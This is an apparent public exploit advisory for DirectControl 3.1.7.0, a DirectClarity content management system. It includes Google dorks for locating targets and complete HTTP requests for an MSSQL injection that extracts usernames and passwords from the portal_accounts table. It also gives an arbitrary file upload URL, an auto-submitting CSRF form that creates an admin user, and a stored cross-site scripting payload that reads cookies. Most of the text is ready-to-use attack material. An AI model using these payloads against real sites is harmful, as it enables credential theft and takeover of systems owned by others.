DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties ==================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Script : www.directclarity.com .:. Dork : [1]intext:"DirectClarity, LLC All Rights Reserved." [2]inurl:"/cm/password_retrieve.asp?redir_id=1" #################################################################### ################################ [1] Sql Injection =================== type: Post String Mssql Injection extrct version database: ------------------------- POST /cm/password_retrieve.asp HTTP/1.1 Host: www.server.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site/cm/password_retrieve.asp Cookie: __utma= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 98 redir_id=1&uname=' and+1=cast(@@version as int)-- -&email_password=Email+My+Password HTTP/1.1 500 Internal Server Error Content-Type: text/html Cache-Control: private Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Content-Length: 352 redir_id=1&uname=|command|&email_password=Email+My+Password extrct Username & password: ---------------------------- information: tablename:portal_accounts columns: username , password POST /cm/password_retrieve.asp HTTP/1.1 Host: www.server.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site/cm/password_retrieve.asp Cookie: __utma= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 98 redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int) -- -&email_password=Email+My+Password HTTP/1.1 500 Internal Server Error Content-Type: text/html Cache-Control: private Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Content-Length: 352 username: redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts) as int) -- -&email_password=Email+My+Password password: redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts) as int) -- -&email_password=Email+My+Password [2] Arbitrary File Upload ========================== http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images your file: http://site/cm/media/images [3] CSRF [Add Admin] ===================== <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://site/cm/admin.asp"> <input type="hidden" name="fname" value="...."/> <input type="hidden" name="lname" value="...."/> <input type="hidden" name="uname" value="admin"/> <input type="hidden" name="pword" value="123456"/> <input type="hidden" name="telco" value="...."/> <input type="hidden" name="email" value="...."/> <input type="hidden" name="ustat" value="0"/> <input type="hidden" name="SecGroupDropDown" value="1"/> <input type="hidden" name="AddButton" value="ADD THIS USER"/> <input type="hidden" name="pageView" value="User Administration"/> <input type="hidden" name="pageAction" value="Add System User"/> <input type="hidden" name="whatDo" value="AddUserAction"/> </form> </body> </html> [4] Cross Site Scripting ========================= Go to: http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS Management and add new channel put in new channel: <script>alert(document.cookie);</script> and submit! ####################################################################Брой прочитания на тази страница: 1222
DirectControlTM Version 3.1.7.0 – Multiple Vulnerabilties